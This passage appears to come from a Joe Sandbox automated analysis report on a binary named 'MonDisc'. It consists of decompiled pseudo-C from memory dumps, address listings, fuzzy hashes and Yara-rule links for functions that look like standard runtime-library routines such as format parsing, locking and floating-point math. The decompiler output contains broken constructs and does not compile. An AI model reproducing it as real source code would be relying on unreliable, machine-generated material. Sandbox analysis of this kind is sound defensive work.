				if ( *((intOrPtr*)(__rcx + 0x90)) == 0) goto 0x2c916950;
				 *((intOrPtr*)(__rcx + 0x58))();
				return 0;
			}













                              0x7ff62c916910
                              0x7ff62c916916
                              0x7ff62c916922
                              0x7ff62c916927
                              0x7ff62c916934
                              0x7ff62c91693a
                              0x7ff62c91693f
                              0x7ff62c916944
                              0x7ff62c916949
                              0x7ff62c916950
                              0x7ff62c916957
                              0x7ff62c91695d
                              0x7ff62c916960
                              0x7ff62c91696a
                              0x7ff62c91696c
                              0x7ff62c916974
                              0x7ff62c91697b
                              0x7ff62c916980
                              0x7ff62c916985
                              0x7ff62c91698a
                              0x7ff62c91698f
                              0x7ff62c916999
                              0x7ff62c9169a0
                              0x7ff62c9169a6
                              0x7ff62c9169ac
                              0x7ff62c9169b5
                              0x7ff62c9169bd
                              0x7ff62c9169ca
                              0x7ff62c9169dd
                              0x7ff62c9169ec

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Sleep$AcquireCriticalLeaveLockSection
                              • String ID:
                              • API String ID: 1711459333-0
                              • Opcode ID: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction ID: 09a5473a5e9af49e8af6a2d4ca76c840cd3dd0b496ef0919275007a0719e2926
                              • Opcode Fuzzy Hash: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction Fuzzy Hash: 95217F32E0CA8187DB588F28988137C7365FB45B75F141235EA6E826D9CF7CE945CB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C913ED0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction ID: bc53e9b13fdaa83b3c713f87617b3435433ebed20d3bda400750e55eb9a20c30
                              • Opcode Fuzzy Hash: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction Fuzzy Hash: D8117B31F0CB81C2FF618B19B80512966B5FB48BE0F484135E65D92B99DF7CD5908701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98DEE4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E00007FF67FF62C98DEE4(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, void* __rbp, long long _a8, long long _a16) {
				void* _t75;
				void* _t89;
				void* _t95;
				signed int _t98;
				signed int _t105;
				signed int _t107;
				char _t109;
				void* _t110;
				signed int _t111;
				signed int _t112;
				void* _t113;
				signed int _t121;
				intOrPtr* _t137;
				intOrPtr* _t141;
				void* _t143;
				char _t151;
				void* _t156;

				_t157 = __rbp;
				_t137 = __rax;
				_t110 = __edx;
				_a8 = __rbx;
				_a16 = __rdi;
				_t143 = __rcx;
				_t112 = _t111 | 0xffffffff;
				if ( *((intOrPtr*)(__rcx + 0x468)) == 0) goto 0x2c98e0e3;
				if (E00007FF67FF62C99AE4C(_t75,  *((intOrPtr*)(__rcx + 0x468))) == 0) goto 0x2c98e0f3;
				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0x2c98df35;
				E00007FF67FF62C984D84(_t137);
				 *_t137 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98e0f5;
				 *((intOrPtr*)(_t143 + 0x470)) =  *((intOrPtr*)(_t143 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t143 + 0x470)) == 2) goto 0x2c98e0de;
				 *(_t143 + 0x50) =  *(_t143 + 0x50) & 0x00000000;
				 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
				goto 0x2c98e0aa;
				 *((long long*)(_t143 + 0x18)) =  *((long long*)(_t143 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t143 + 0x28)) < 0) goto 0x2c98e0bf;
				_t151 =  *((char*)(_t143 + 0x41));
				if (_t151 - 0x20 - 0x5a > 0) goto 0x2c98df84;
				_t138 = _t151 - 0x20;
				goto 0x2c98df86;
				_t98 =  *(0x2ca11bc0 + (_t151 - 0x20) * 8);
				 *(_t143 + 0x2c) = _t98;
				if (_t98 == 8) goto 0x2c98e0e3;
				_t121 = _t98;
				if (_t121 == 0) goto 0x2c98e09e;
				if (_t121 == 0) goto 0x2c98e085;
				if (_t121 == 0) goto 0x2c98e050;
				if (_t121 == 0) goto 0x2c98e025;
				if (_t121 == 0) goto 0x2c98e01c;
				if (_t121 == 0) goto 0x2c98dff0;
				if (_t121 == 0) goto 0x2c98dfe3;
				if (_t98 - 0xfffffffffffffffc != 1) goto 0x2c98e0f3;
				E00007FF67FF62C992418(_t98 - 0xfffffffffffffffc, __edx, _t112, _t113, _t151 - 0x20, _t143, _t143, _t156, __rbp);
				goto 0x2c98e0a6;
				E00007FF67FF62C991200(_t95, _t98 - 0xfffffffffffffffc, _t151 - 0x20, _t143);
				goto 0x2c98e0a6;
				if (_t110 == 0x2a) goto 0x2c98e006;
				E00007FF67FF62C98D734(_t138, _t143, _t143, _t143 + 0x38, _t157);
				goto 0x2c98e0a6;
				 *((long long*)(_t143 + 0x20)) =  *((long long*)(_t143 + 0x20)) + 8;
				_t105 =  *( *((intOrPtr*)(_t143 + 0x20)) - 8);
				_t106 =  <  ? _t112 : _t105;
				 *(_t143 + 0x38) =  <  ? _t112 : _t105;
				goto 0x2c98e04c;
				 *(_t143 + 0x38) =  *(_t143 + 0x38) & 0x00000000;
				goto 0x2c98e0aa;
				if (_t110 == 0x2a) goto 0x2c98e030;
				goto 0x2c98dff9;
				 *((long long*)(_t143 + 0x20)) =  *((long long*)(_t143 + 0x20)) + 8;
				_t107 =  *( *((intOrPtr*)(_t143 + 0x20)) - 8);
				 *(_t143 + 0x34) = _t107;
				if (_t107 >= 0) goto 0x2c98e04c;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000004;
				 *(_t143 + 0x34) =  ~_t107;
				goto 0x2c98e0a6;
				_t89 = _t110;
				if (_t110 == 0x20) goto 0x2c98e07f;
				if (_t89 == 0x23) goto 0x2c98e079;
				if (_t89 == 0x2b) goto 0x2c98e073;
				if (_t89 == 0x2d) goto 0x2c98e06d;
				if (_t89 != 0x30) goto 0x2c98e0aa;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000008;
				goto 0x2c98e0aa;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000004;
				goto 0x2c98e0aa;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000001;
				goto 0x2c98e0aa;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000020;
				goto 0x2c98e0aa;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) | 0x00000002;
				goto 0x2c98e0aa;
				 *(_t143 + 0x34) =  *(_t143 + 0x34) & 0x00000000;
				 *(_t143 + 0x30) =  *(_t143 + 0x30) & 0x00000000;
				 *(_t143 + 0x3c) =  *(_t143 + 0x3c) & 0x00000000;
				 *((char*)(_t143 + 0x40)) = 0;
				 *(_t143 + 0x38) = _t112;
				 *((char*)(_t143 + 0x54)) = 0;
				goto 0x2c98e0aa;
				if (E00007FF67FF62C9900E4( ~_t107, _t143) == 0) goto 0x2c98e0f3;
				_t141 =  *((intOrPtr*)(_t143 + 0x18));
				_t109 =  *_t141;
				 *((char*)(_t143 + 0x41)) = _t109;
				if (_t109 != 0) goto 0x2c98df5c;
				 *((long long*)(_t143 + 0x18)) =  *((long long*)(_t143 + 0x18)) + 1;
				if ( *(_t143 + 0x2c) == 0) goto 0x2c98e0cb;
				if ( *(_t143 + 0x2c) != 7) goto 0x2c98e0e3;
				 *((intOrPtr*)(_t143 + 0x470)) =  *((intOrPtr*)(_t143 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t143 + 0x470)) != 2) goto 0x2c98df4f;
				goto 0x2c98e0f5;
				E00007FF67FF62C984D84(_t141);
				 *_t141 = 0x16;
				E00007FF67FF62C9C599C();
				return _t112;
			}




















                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee9
                              0x7ff62c98def4
                              0x7ff62c98def7
                              0x7ff62c98df04
                              0x7ff62c98df11
                              0x7ff62c98df1c
                              0x7ff62c98df1e
                              0x7ff62c98df23
                              0x7ff62c98df29
                              0x7ff62c98df30
                              0x7ff62c98df35
                              0x7ff62c98df42
                              0x7ff62c98df4f
                              0x7ff62c98df53
                              0x7ff62c98df57
                              0x7ff62c98df5c
                              0x7ff62c98df64
                              0x7ff62c98df6a
                              0x7ff62c98df74
                              0x7ff62c98df76
                              0x7ff62c98df82
                              0x7ff62c98df8f
                              0x7ff62c98df93
                              0x7ff62c98df99
                              0x7ff62c98df9f
                              0x7ff62c98dfa1
                              0x7ff62c98dfaa
                              0x7ff62c98dfb3
                              0x7ff62c98dfbc
                              0x7ff62c98dfc1
                              0x7ff62c98dfc6
                              0x7ff62c98dfcb
                              0x7ff62c98dfd0
                              0x7ff62c98dfd9
                              0x7ff62c98dfde
                              0x7ff62c98dfe6
                              0x7ff62c98dfeb
                              0x7ff62c98dff3
                              0x7ff62c98dffc
                              0x7ff62c98e001
                              0x7ff62c98e006
                              0x7ff62c98e00f
                              0x7ff62c98e014
                              0x7ff62c98e017
                              0x7ff62c98e01a
                              0x7ff62c98e01c
                              0x7ff62c98e020
                              0x7ff62c98e028
                              0x7ff62c98e02e
                              0x7ff62c98e030
                              0x7ff62c98e039
                              0x7ff62c98e03c
                              0x7ff62c98e041
                              0x7ff62c98e043
                              0x7ff62c98e049
                              0x7ff62c98e04e
                              0x7ff62c98e050
                              0x7ff62c98e055
                              0x7ff62c98e059
                              0x7ff62c98e05d
                              0x7ff62c98e061
                              0x7ff62c98e065
                              0x7ff62c98e067
                              0x7ff62c98e06b
                              0x7ff62c98e06d
                              0x7ff62c98e071
                              0x7ff62c98e073
                              0x7ff62c98e077
                              0x7ff62c98e079
                              0x7ff62c98e07d
                              0x7ff62c98e07f
                              0x7ff62c98e083
                              0x7ff62c98e085
                              0x7ff62c98e089
                              0x7ff62c98e08d
                              0x7ff62c98e091
                              0x7ff62c98e095
                              0x7ff62c98e098
                              0x7ff62c98e09c
                              0x7ff62c98e0a8
                              0x7ff62c98e0aa
                              0x7ff62c98e0ae
                              0x7ff62c98e0b0
                              0x7ff62c98e0b5
                              0x7ff62c98e0bb
                              0x7ff62c98e0c3
                              0x7ff62c98e0c9
                              0x7ff62c98e0cb
                              0x7ff62c98e0d8
                              0x7ff62c98e0e1
                              0x7ff62c98e0e3
                              0x7ff62c98e0e8
                              0x7ff62c98e0ee
                              0x7ff62c98e105

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: b6a25df9840ecf1653155f71c6feae910b6b73a21f0a4fc9273019de221468bb
                              • Instruction ID: b5030537f341d675d62111747b55861762c68033ddbab1c7a29fc8ed59e8db36
                              • Opcode Fuzzy Hash: b6a25df9840ecf1653155f71c6feae910b6b73a21f0a4fc9273019de221468bb
                              • Instruction Fuzzy Hash: 58618577D1C286C6EF688F288864B7C37A9EB15BA8F141735C60A872DACF2DD441C603
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E5C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E00007FF67FF62C98E5C0(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t82;
				void* _t85;
				intOrPtr _t88;
				signed int _t95;
				signed int _t97;
				char _t99;
				void* _t100;
				signed int _t101;
				signed int _t102;
				intOrPtr _t110;
				void* _t132;
				void* _t134;
				char _t139;
				signed int _t144;

				_t146 = __rbp;
				_t144 = __rsi;
				_t134 = __rcx;
				_t100 = __edx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t102 = _t101 | 0xffffffff;
				_t132 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == __rsi) goto 0x2c98e7bf;
				if ( *((intOrPtr*)(__rcx + 0x18)) != __rsi) goto 0x2c98e607;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98e7a9;
				 *((intOrPtr*)(_t134 + 0x470)) =  *((intOrPtr*)(_t134 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t134 + 0x470)) == 2) goto 0x2c98e7a6;
				 *((intOrPtr*)(_t132 + 0x50)) = 0;
				 *((intOrPtr*)(_t132 + 0x2c)) = 0;
				goto 0x2c98e773;
				 *((long long*)(_t132 + 0x18)) =  *((long long*)(_t132 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t132 + 0x28)) < 0) goto 0x2c98e788;
				_t139 =  *((char*)(_t132 + 0x41));
				if (_t139 - 0x20 - 0x5a > 0) goto 0x2c98e653;
				_t127 = _t139 - 0x20;
				goto 0x2c98e655;
				_t88 =  *((intOrPtr*)(0x2ca11bc0 + (_t139 - 0x20) * 8));
				 *((intOrPtr*)(_t132 + 0x2c)) = _t88;
				if (_t88 == 8) goto 0x2c98e7bf;
				_t110 = _t88;
				if (_t110 == 0) goto 0x2c98e767;
				if (_t110 == 0) goto 0x2c98e753;
				if (_t110 == 0) goto 0x2c98e71e;
				if (_t110 == 0) goto 0x2c98e6f3;
				if (_t110 == 0) goto 0x2c98e6eb;
				if (_t110 == 0) goto 0x2c98e6bf;
				if (_t110 == 0) goto 0x2c98e6b2;
				if (_t88 - 0xfffffffffffffffc != 1) goto 0x2c98e7cf;
				E00007FF67FF62C992BBC(_t85, _t88 - 0xfffffffffffffffc, __edx, _t102, 0, _t139 - 0x20, _t132, _t132, __rsi, __rbp);
				goto 0x2c98e76f;
				E00007FF67FF62C991650(_t85, _t88 - 0xfffffffffffffffc, _t139 - 0x20, _t132);
				goto 0x2c98e76f;
				if (_t100 == 0x2a) goto 0x2c98e6d5;
				E00007FF67FF62C98D920(_t127, _t132, _t132, _t132 + 0x38, _t146);
				goto 0x2c98e76f;
				 *((long long*)(_t132 + 0x20)) =  *((long long*)(_t132 + 0x20)) + 8;
				_t95 =  *( *((intOrPtr*)(_t132 + 0x20)) - 8);
				_t96 =  <  ? _t102 : _t95;
				 *(_t132 + 0x38) =  <  ? _t102 : _t95;
				goto 0x2c98e71a;
				 *(_t132 + 0x38) = 0;
				goto 0x2c98e773;
				if (_t100 == 0x2a) goto 0x2c98e6fe;
				goto 0x2c98e6c8;
				 *((long long*)(_t132 + 0x20)) =  *((long long*)(_t132 + 0x20)) + 8;
				_t97 =  *( *((intOrPtr*)(_t132 + 0x20)) - 8);
				 *(_t132 + 0x34) = _t97;
				if (_t97 >= 0) goto 0x2c98e71a;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000004;
				 *(_t132 + 0x34) =  ~_t97;
				goto 0x2c98e76f;
				_t82 = _t100;
				if (_t100 == 0x20) goto 0x2c98e74d;
				if (_t82 == 0x23) goto 0x2c98e747;
				if (_t82 == 0x2b) goto 0x2c98e741;
				if (_t82 == 0x2d) goto 0x2c98e73b;
				if (_t82 != 0x30) goto 0x2c98e773;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000008;
				goto 0x2c98e773;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000004;
				goto 0x2c98e773;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000001;
				goto 0x2c98e773;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000020;
				goto 0x2c98e773;
				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000002;
				goto 0x2c98e773;
				 *(_t132 + 0x30) = _t144;
				 *((intOrPtr*)(_t132 + 0x40)) = sil;
				 *(_t132 + 0x38) = _t102;
				 *((intOrPtr*)(_t132 + 0x3c)) = 0;
				 *((intOrPtr*)(_t132 + 0x54)) = sil;
				goto 0x2c98e773;
				if (E00007FF67FF62C990258(_t132) == 0) goto 0x2c98e7cf;
				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))));
				 *((char*)(_t132 + 0x41)) = _t99;
				if (_t99 != 0) goto 0x2c98e62c;
				 *((long long*)(_t132 + 0x18)) =  *((long long*)(_t132 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t132 + 0x2c)) == 0) goto 0x2c98e793;
				if ( *((intOrPtr*)(_t132 + 0x2c)) != 7) goto 0x2c98e7bf;
				 *((intOrPtr*)(_t132 + 0x470)) =  *((intOrPtr*)(_t132 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t132 + 0x470)) != 2) goto 0x2c98e621;
				return  *((intOrPtr*)(_t132 + 0x28));
			}

















                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c5
                              0x7ff62c98e5ca
                              0x7ff62c98e5d5
                              0x7ff62c98e5da
                              0x7ff62c98e5e4
                              0x7ff62c98e5ee
                              0x7ff62c98e5f0
                              0x7ff62c98e5f5
                              0x7ff62c98e5fb
                              0x7ff62c98e602
                              0x7ff62c98e607
                              0x7ff62c98e614
                              0x7ff62c98e621
                              0x7ff62c98e624
                              0x7ff62c98e627
                              0x7ff62c98e62c
                              0x7ff62c98e633
                              0x7ff62c98e639
                              0x7ff62c98e643
                              0x7ff62c98e645
                              0x7ff62c98e651
                              0x7ff62c98e65e
                              0x7ff62c98e662
                              0x7ff62c98e668
                              0x7ff62c98e66e
                              0x7ff62c98e670
                              0x7ff62c98e679
                              0x7ff62c98e682
                              0x7ff62c98e68b
                              0x7ff62c98e690
                              0x7ff62c98e695
                              0x7ff62c98e69a
                              0x7ff62c98e69f
                              0x7ff62c98e6a8
                              0x7ff62c98e6ad
                              0x7ff62c98e6b5
                              0x7ff62c98e6ba
                              0x7ff62c98e6c2
                              0x7ff62c98e6cb
                              0x7ff62c98e6d0
                              0x7ff62c98e6d5
                              0x7ff62c98e6de
                              0x7ff62c98e6e3
                              0x7ff62c98e6e6
                              0x7ff62c98e6e9
                              0x7ff62c98e6eb
                              0x7ff62c98e6ee
                              0x7ff62c98e6f6
                              0x7ff62c98e6fc
                              0x7ff62c98e6fe
                              0x7ff62c98e707
                              0x7ff62c98e70a
                              0x7ff62c98e70f
                              0x7ff62c98e711
                              0x7ff62c98e717
                              0x7ff62c98e71c
                              0x7ff62c98e71e
                              0x7ff62c98e723
                              0x7ff62c98e727
                              0x7ff62c98e72b
                              0x7ff62c98e72f
                              0x7ff62c98e733
                              0x7ff62c98e735
                              0x7ff62c98e739
                              0x7ff62c98e73b
                              0x7ff62c98e73f
                              0x7ff62c98e741
                              0x7ff62c98e745
                              0x7ff62c98e747
                              0x7ff62c98e74b
                              0x7ff62c98e74d
                              0x7ff62c98e751
                              0x7ff62c98e753
                              0x7ff62c98e757
                              0x7ff62c98e75b
                              0x7ff62c98e75e
                              0x7ff62c98e761
                              0x7ff62c98e765
                              0x7ff62c98e771
                              0x7ff62c98e777
                              0x7ff62c98e779
                              0x7ff62c98e77e
                              0x7ff62c98e784
                              0x7ff62c98e78b
                              0x7ff62c98e791
                              0x7ff62c98e793
                              0x7ff62c98e7a0
                              0x7ff62c98e7be

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 0095a1f0982937b9620c8ccfdea1be70b52ebf803ae852666ba4312be0df93d2
                              • Instruction ID: 01026ffb124fd85dcca06296ca1f9430ef9491fccbbbe7e988da7b4aceed6399
                              • Opcode Fuzzy Hash: 0095a1f0982937b9620c8ccfdea1be70b52ebf803ae852666ba4312be0df93d2
                              • Instruction Fuzzy Hash: 1B618D7AD0C29286EF648F248C6453C37A9FB45FA8F545335D64EC329ACF28E441C706
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E3AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E3AC(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long _a8, long long _a16) {
				signed int _t9;

				_a8 = __rbx;
				_a16 = __rdi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e3f1;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				return _t9 | 0xffffffff;
			}




                              0x7ff62c98e3ac
                              0x7ff62c98e3b1
                              0x7ff62c98e3cc
                              0x7ff62c98e3ce
                              0x7ff62c98e3d3
                              0x7ff62c98e3d9
                              0x7ff62c98e3f0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: de4eb872028e4ab4c05b4c01f20d71709c4eec9a6ff6979106dcf8b51b761e3e
                              • Instruction ID: 990b861c18602e9c6ac39ea76a444488e95763bfeed27832c8a4811a559774a7
                              • Opcode Fuzzy Hash: de4eb872028e4ab4c05b4c01f20d71709c4eec9a6ff6979106dcf8b51b761e3e
                              • Instruction Fuzzy Hash: 7C617676D0C1968AEF648F248864B7D37A9EB15BA8F141335DA0EC72DBDF28E441C602
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B5B00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                              Download Yara Rule
                              C-Code - Quality: 18%
                              			E00007FF67FF62C9B5B00(signed int __eax, void* __fp0, void* __rax, signed int __r8, signed int __r9) {
				long long _v120;
				long long _v136;
				intOrPtr _v144;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t20;
				void* _t22;
				long long _t26;
				void* _t29;
				void* _t30;
				signed long long _t32;
				signed long long _t33;
				void* _t34;
				signed long long _t36;
				signed long long _t37;
				signed long long _t39;

				asm("movdqa [esp+0x50], xmm6");
				asm("movdqa [esp+0x60], xmm7");
				_t39 =  *0x2ca16ce0; // 0x7ff0000000000000
				asm("dec cx");
				asm("dec cx");
				_t32 = __r8 &  *0x2ca16d20;
				_t36 = __r9 &  *0x2ca16d20;
				_t14 = _t36 -  *0x2ca16ce0; // 0x7ff0000000000000
				if (_t14 > 0) goto 0x2c9b5db0;
				_t15 = _t32 -  *0x2ca16ce0; // 0x7ff0000000000000
				if (_t15 > 0) goto 0x2c9b5dc0;
				if (_t15 == 0) goto 0x2c9b5d50;
				if (_t36 == 0) goto 0x2c9b5da0;
				if (_t32 == _t36) goto 0x2c9b5d30;
				asm("dec cx");
				asm("dec cx");
				asm("movapd xmm4, xmm0");
				asm("movapd xmm5, xmm1");
				asm("movapd xmm3, [0x611a1]");
				_t33 = _t32 & _t39;
				_t37 = _t36 & _t39;
				asm("dec ecx");
				asm("dec ecx");
				if (_t33 == 0) goto 0x2c9b5ce0;
